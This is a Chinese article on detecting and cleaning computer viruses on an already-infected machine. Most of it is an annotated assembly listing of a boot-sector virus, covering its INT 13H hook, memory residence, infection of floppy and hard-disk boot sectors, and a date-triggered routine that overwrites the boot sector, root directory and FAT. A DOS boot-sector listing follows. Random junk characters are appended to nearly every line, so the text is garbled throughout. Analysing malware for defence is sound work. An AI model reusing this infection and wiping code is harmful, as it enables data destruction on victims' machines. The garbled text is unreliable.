近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 A6!F@Ic[
?? S\=1_LDx"
?? 一 、 带毒环境下检测清除病毒的意义 R#W&ery
?? 4<gb36)|4
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 q%i-`S]}qL
?? }ptq
)p
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 VUwC-)
?? E\U`2{^.
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 O9"/
kmB
?? *F`A S>
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 69G`2_eKCp
?? ;
)Eo7?]-
?? 二 、带毒环境下检测清除病毒的原理 Fmr}o(q1
?? k[kju%i4
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 Vsnuy8~k
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 8gy_Yj&{P
[yS#O\$'e
[eUftr9&0
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " Ul+Mo&y-
病毒体: %$5H!!~o
JMP 01AF ;JMP到01AF OLC{iD#
DB 00 ;病毒标计 5ZY<JA3
DW 00F5 ;此为搬到高位址后,远程跳转指令 4\M.6])_
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX S* *oA 6
DB 02 tjT>VwqH
DW 0003 ;此为软盘识别标记,硬盘为0007 vVl; |
DW EC59 ; XB59Vm0E=
DW F000 ;INT 13H的原入口 w= P9FxB
. "vZ!vt#'Y
. $~;D9
. OTDg5:>
. ^Yj xeNY
. fw6UhG
XOR AX,AX ;清除AX ~m^ #FJu
MOV DS,AX; ;让DS=0000 %zk$}}ti.
CLI ;清I标志积存器 re?s.djT
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 r.ZF_^y}+
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 0tg8~H3yy
MOV SP,AX ;开机时为0000:7CB6 &0zT I?c
STI ;设I标志积存器 jz58E}
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A
Q6'x\
PUSH AX ;用RETF,把程序转到引导或分区表位置 UFAL1c<V
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 I/gjenUK
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 ,Uhb
MOV AX,[004E] ;取INT 13H的段地址 V'*~L\;pU
MOV [7C0C],AX ;存到010C 7\FXz'hA
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 I`KQ|h0%
;读写以便传播发作 o]:3H8
l<0}l^C.
MOV AX,[0413] ;取得内存K数,放在AX `K~AhlJUQ
DEC AX ; Suk
DEC AX ;减2k内存 yeDsJ/L
MOV [0413],AX ;存回,通常是638K :G\<y
MOV CL,06 ; w}Uhd,
SHL AX,CL ; ]I3!fEAWR
MOV ES,AX ;算出减2K后病毒本体的位址 J:&[59
MOV [7C05],AX ;AX存入0105 EnOU?D
PxH72hBS
;病毒常用手法将系统高段内存减少以便驻留 mKo C.J
;这样可以免于被其他程序覆盖 !aO` AC=5u
b4^`DHRu6
MOV AX,000E ;病毒拦INT 13H ;JZS^Wa
;ISR起始的偏移量 dT,o=8fg
MOV [004C],AX ; )jrV#/m9
MOV [004E],ES ;设原为病毒的INT 13H r{l(O,|e
MOV CX,01BE ;病毒长度为1BE .`>y@p!
MOV SI,7C00 ;从JMP 01AF开始 cuy1DDl
XOR DI,DI ;DI=0
Uf}\p~;
CLD ;清方向标志 _uc
hU=
REPZ; Vz6Qxd{m3
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 p+)Y Tzzc
CS: ;分区表能载入0000:7C00正常运作 B,,D7cQC
JMP FAR [7C03] ;跳到为搬过后的位址 Sb~MQ_
XOR AX,AX ;清AX da)NK!
MOV ES,AX ;ES=0000 Xy5e5K
INT 13 ;复位磁盘 g=I8@m
PUSH CS ; ZXm/A0)S
POP DS ;让DS=CS (}}S9 K
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 ^Q+g({
MOV BX,7C00 ;读到0000:7C00 gz3pX#S
MOV CX,[0008] ;硬盘第0道,第7扇区 y+7w,m2
CMP CX,+07 ;比较是否从硬盘启动 U8
nH;}i
JNZ 0213 ;不是跳0213 g<~Cpd
MOV DX,0080 ;第一硬盘C:第零面 h@a+NE8
INT 13 ;用INT 13号中断,读 rRFhGQq1m
JMP 023E ;跳023E比较日期,发作或正常开机 ;G%R<Z
MOV CX,[0008] ;软盘0道,第3扇区 LD!Q8"
MOV DX,0100 ;A:的第0面 s6>ZREf#J
INT 13 ;INT 13读盘 }iuWAFZbGS
JB 023E ;失败跳023E 8<Hf"M
PUSH CS :0h_K
POPES ;让ES=CS o"*AtGR+"
MOV AX,0201 ; K'GBMnjD
MOV BX,0200 ; kh`"WN Nt
MOV CX,0001 ; D*lKn62
MOV DX,0080 ; K.0:C`C
INT 13 ;读入C:的分区表到0200,以便下面比较 2k=#om19
JB 023E ;失败跳023E ^pUHKXihD
XOR SI,SI ;清SI Hro-d1J7
CLD ;清方向标志以便比较 #'y#"cmQ.
LODSW ;载入一个WORD到AX aTt12Sc
CMP AX,[BX] ;比较有无病毒存在..E9AC I"GB<oB
JNZ 0287 ;没有则跳0287传染 @Z12CrJ
LODSW ;载入一个WORD到AX d@qsdYu-*
CMP AX,[BX+02] ;再次确认..0000 Y=Kc'x[,Zj
JNZ 0287 ;没有跳0287 P?k0zwOlBl
XOR CX,CX ;清CX OynXkH]0T+
MOV AH,04 ; /{&tY:;m
INT 1A ;取得日期 ,k;^G><
=
CMP DX,0306 ;是否为三月六日 ;5)P6S.D
JZ 024B ;是跳024B传染 aeD ;5VV
RETF ;把程序交还给引导启动完成 ,'u W*kx
t;}:waZD
步骤4:病毒INT 13代码分析 }|pwz
方法:U }R{ts
PUSH DS ;首先把要用到积存器 r [*Vqcz
PUSH AX ;入栈保存 0.@&_XTPl
OR DL,DL ;比较是否为软盘 \RG8{G,
JNZ 002F ;如不是则退出传染 5;YMqUkw
XOR AX,AX ;AX=0 jWrj?DV,2N
MOV DS,AX ;数据代段=0 hbY5l}\5
TEST BYTE PTR [043F],01 ;比较是否为A盘 B\o Mn
JNZ 002F ;不是则退出 ++^l]8
POP AX ;将以上保存积存器 (^Y~/
POP DS ;弹栈恢复 XzEc2)0'v
PUSHF ;压栈标志积存器 TIQkW,
CS: ;以便执行原INT 13 c"B{/;A
CALL FAR [000A] ;执行原INT 13 #
mV{#B=
PUSHF ;再次压栈 Q|#W#LV,K
CALL 0036 ;以便跳转到传染程序 AT2n VakL
POPF ;跳转到执行传染 f,kZ\Ia'r
RETF 0002 ;结束中断调用返回 +nJgl8'^y
POP AX ;恢复 |Uc_G13Y{D
POP DS ;堆栈 (KDD e}f
CS: ;跳转到原正常INT 13 sTn<#l6
JMP FAR [000A] ;地址执行 ~T1XLu
)-a'{W/t
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 [PNT\ElT
+%ee8|\
步骤5:传染过程分析 s~5[![1
K
方法:U hEKf6#
对软盘传染过程: u>2
l7PA|
PUSH AX ;工 hoK>~:;
PUSH BX ;作 5kCUaPu
PUSH CX ;寄 E87Ww,z8
PUSH DX ;存 H|3:6x
PUSH DS ;器 H9YW
PUSH ES ;入 jIC_[
PUSH SI ;栈 Cv6'`",Yzm
PUSH DI ;保存 TFlet"ge=
PUSH CS ;以压/弹栈方式 >7jbgHB
POP DS ;使数据段DS和 TJK[ev};S
PUSH CS ;附加段ES均指向 9\_eK,*B
POP ES ;代码段CS /|C*
MOV SI,0004 ;试4次 Rwz0poG`WG
MOV AX,0201 ;设置各 /5(Yy}
MOV BX,0200 ;积存器
TQpf Q
MOV CX,0001 ;为读软盘 p@xf^[50k
XOR DX,DX ;引导扇区做准备 gOSJM1Mr3
PUSHF ;压栈标志积存器 jB%lB1Q|
CALL FAR [000A] ;正常的INT 13调用 Qz5sxi
JNB 0063 ;成功则转判断 ILEz;D{]
XOR AX,AX ;不成功复位 (l^3Z3zf&
PUSHF ;磁盘继续读 QbkLdM,S*
CALL FAR [000A] ;如果4次 hT`J1nNt
DEC SI ;均匀不成功 v+46QK|I&
JNZ 0045 ;则退出跳转 ;z}i-cNae
JMP 00A6 ;退出传染 JtYP E?
XOR SI,SI ;SI=0以便用 s4A43i'g!h
CLD ;LODSW读入软盘 5m\<U`
LODSW ;第1或第2字进行比较 {< )1q ;
CMP AX,[BX] ;比较如果不包含病毒标志 $'BSH4~|.
JNZ 0071 ;则跳转写传染 a,
k'Vk{
LODSW ;如果已有标志
P5a4ze
CMP AX,[BX+02] ;则退出 Ql/cN%^j$
JZ 00A6 ;传染子程序 EofymAi%
MOV AX,0301 ;为写盘准备 ZSjMH .Ij"
MOV DH,01 ;如果是360K 7K,-01-:
MOV CL,03 ;则写到1面0道3扇区 R!\_rc1/
CMP BYTE PTR [BX+15],FD ;比较软盘 uki#/GzaO
JZ 0080 ;如果大于360K }vxw*8d?
MOV CL,0E ;写到1面0道14扇区 Qu?R8+"KS
MOV [0008],CX ;写病毒标志到软盘 =RA /
PUSHF ;调用原INT 13 LClNxm2X
CALL FAR [000A] ;进行传染 Q sZx)
bO
JB 00A6 (eI5_`'VC
MOV SI,03BE ;以下是将正常 i2E)P x
MOV DI,01BE ;引导扇区从 !=;+%C&8y
MOV CX,0021 ;1BE起的21字节内容 *"?l ]d
CLD ;搬移到病毒程序尾部 |=Eo?Q_
REPZ ;开始复制 s.bc>E0
MOVSW +T|JK7
MOV AX,0301 ;写盘功能调用,写一个扇区 z>58dA@f
XOR BX,BX ;将病毒程序 nKPYOY8^
MOV CX,0001 ;写入软盘引导扇区内 [~-9i&Z
XOR DX,DX ;设置为软盘 b LlKe50
PUSHF K0-ypU*P
CALL FAR [000A] ;执行正常INT 13调用写盘 "?]{%-u
POP DI ;将 2D75:@JL}|
POP SI ;工 B~ ]k#Ot)
POP ES ;作 Y2a5bc P
POP DS ;寄 cii_U=
POP DX ;存 w~(1%p/
POP CX ;器 !\zWF
POP BX ;退 *w^C"^*
POP AX ;栈 =5J7Hw&K
RET ;返回调用处 x2OaPlG,&V
对硬盘传染过程: "'c
A2~
MOV CX,0007 ;第7扇区 ]NUl9t*N4
MOV [0008],CX ;此处为硬盘引导标记 zMj#KA1
MOV AX,301 ;写功能调用 "$#xK |t
MOV DX,0080 ;设置为硬盘 <e Th
INT 13 ;将正常引导扇区写到0面0道7扇区内 rM`X?>iT+
JB 13E ;失败则转 oe%}?u
MOV SI,03BE ;原分区表地址 >p)MawT]
MOV DI,01BE ;目标地址 'FqQzx"r
MOV CX,0021 ;整个分区表 ?oVx2LdD|
REPNZ rf
$ QxJ
MOVSW ;开始复制 5:pM4J
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 /xsF90c\h
;这样在分析着查看硬盘分区信息时仍能看到该部分 l==``
;内容,以次来麻痹分析者 hBS.a6u1'd
MOV AX,0301 ;准备写病毒提进硬盘 f[@77m*
XOR BX,BX ;病毒体位置 x.7]/)
INC CL ;第一扇区 XRcq hv
INT 13 ;开始写盘传染 5Sm}nH
JMP 013E ;转到13E处判断是否为3月6日,是则发作 \n$u)Xj~6^
-8; 7Sp1
步骤6:破坏过程分析 )Ub_@)X3%l
方法:U H\h3TdL
主要分析对硬盘数据破坏: Id_2PkIN$~
. E)TN,@%
. u?4:H=;>
. TT2d81I3m
. J3e96t~u
. GC>e26\:
MOV DL,80 FG%X~L<d,)
MOV BYTE PTR[0007],04 wb]%m1H`:
;准备写硬盘 k`So -e-
MOV AL,11 ;写17个扇区 R9'b-5q
MOV BX,5000 a6D &/8
MOV ES,BX ;从内存ES:5000中处开始写 wLi4G@jJ
INT 13 ;残不人睹 5"CZh.J
JNB 0179 ;成功转179继续写 E0Y-7&Fv
XOR AH,AH XlV0* }S
INT 13 ;不成功复位磁盘继续 y+X2Pl
INC DH ;使写操作磁头加1继续? Fpm|_f7
CMP DH,[0007] ;比较是否小于0007单元值 '?!zG{x
JB 0150 ;是则返回开始处继续写 ",^Mxm{
XOR DH,DH ;DH=0 gYNjzew'
INC CH ;再加扇区 W }8'Pf
JMP 0150 ;反回继续写 >[9J?H
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 [h^2Y&Au5
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 )[PtaPWeT
;和文件分配表。 8D>n1b(H
<D:.(AUeO
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 1M}5>V{
读盘的时将自身写入磁盘。 V,mw[Hw
引导过程如下: ur3(HL
1>调整堆栈位置 '9S8}q
2>修改并用修改后的磁盘参数表来复位磁盘系统 B
P2=2)Q
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 zfc'=ODX
4>读入根目录表的首扇区 S& SQ
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS I/&%]"[^u
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 v16JgycM
7>跳到0000:0700H处执行IO.SYS,引导完毕 b6Wqr/
003E FA CLI i&5XF
003F 33C0 XOR AX,AX PMNjn9d
0041 8ED0 MOV SS,AX ox(j^x]NC
0041 8ED0 MOV SS,AX pk^K:Xs}
0043 BC007C MOV SP,7C00 ; 初始化堆栈 %5eY'
0046 16 PUSH SS 8dO!
0047 07 POP ES ;(ES)=0000H +?:7O=Y
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H P+s!|7'
004B 36 SS: ;(SS)=0000H ^5H >pat
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI ,{BaePMp
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 |2RC# ]/-Y
004F 56 PUSH SI ;取到后压入堆栈中保存 1`(tf6op
0050 16 PUSH SS ()5[x.xK@
0051 53 PUSH BX ;保存地址0000:0078H !9[>L@#G
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 -*$HddD
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节 \MbB#
0058 FC CLD <~6h|F8
0059 F3 REPZ LS7, a|
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处 pm_`>3
005B 06 PUSH ES ToJ$A`_!`
005C 1F POP DS ;(DS)=0000H (BTVD,G
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间" YE|SKx@
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数" >33=<~#n
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数" lr`&mZ( j
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址) $oj:e?8N
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号 VHCK2}ps
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表 ;D:9+E<>a
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘 2 lj'"nm
0072 7279 JB 00ED ;出错则转出错处理 y9x w
9l'
WU
quN
; 下面一段程序计算扇区位置 d/[;
`ZD+
0074 33C0 XOR AX,AX g;2?F[8Th
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数 )XvilCk1
007A 7408 JZ 0084 ;为零表示大硬盘? X~lVVBO
007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处 | N[<x@
0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的 &3bx`C
0084 A0107C MOV AL,[7C10] ;取FAT表的个数 2w["aVr
=
0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数 3~uW I%I`
008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位) &Xf^Iu
008F 13161E7C ADC DX,[7C1E] ; 高位 XZ^^%*ew
0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位) syaPpM
Q-
0097 83D200 ADC DX,+00 ; (高位) H."EUcE{
009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位) j@SQ~AS
009D 8916527C MOV [7C52],DX ; (高位) W3MU1gl6k{
00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位) !HnXXVW
00A4 89164B7C MOV [7C4B],DX ; (高位) BW 4%l
00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节 aX5
z&r:{
00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数 n/+.s(7c
00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数" G LIi6
00B3 03C3 ADD AX,BX ;这两条指令是为了取整 2/"u5
00B5 48 DEC AX (C@m Lu)
00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数 n=y[CKS
00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位) 2zs73:z
00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位) "#{4d),r
;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS KX'{[7}m'
00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值 a1_GIM0
00C4 8B16527C MOV DX,[7C52] ;取根目录表的首扇的逻辑扇区号(高位) DXJ`oh
00C8 A1507C MOV AX,[7C50] ; (低位) KG|n
00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号 ]x(e&fyHB
00CE 721D JB 00ED ;出错则转出错处理 m^ tFi7c
00D0 B001 MOV AL,01 L.S;J[a;
00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇) A
Q'J9
00D5 7216 JB 00ED ;出错处理 0w&27wW
00D7 8BFB MOV DI,BX ;内存缓冲区的首址 auK?](U
00D9 B90B00 MOV CX,000B ;比较11个字节 l'/R&`-n
00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节 kBD>-5Sn_T
00DF F3 REPZ =;2%a(
00E0 A6 CMPSB ;看第一项是否为IO.SYS apg=-^L'
00E1 750A JNZ 00ED ;不是则出错 <vONmE a
00E3 8D7F20 LEA DI,[BX+20] ;跳过32字节就指向第二项 "1L$|
00E6 B90B00 MOV CX,000B ;比较11个字节 W-?()dX{
00E9 F3 REPZ
1~Oe=`{&
00EA A6 CMPSB ;看第二项是否为MSDOS.SYS q*_/to
00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理 o<COm9)i
pe] A5\4c
;下面一段进行出错处理 C71qPb|$R
00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..." !cO]<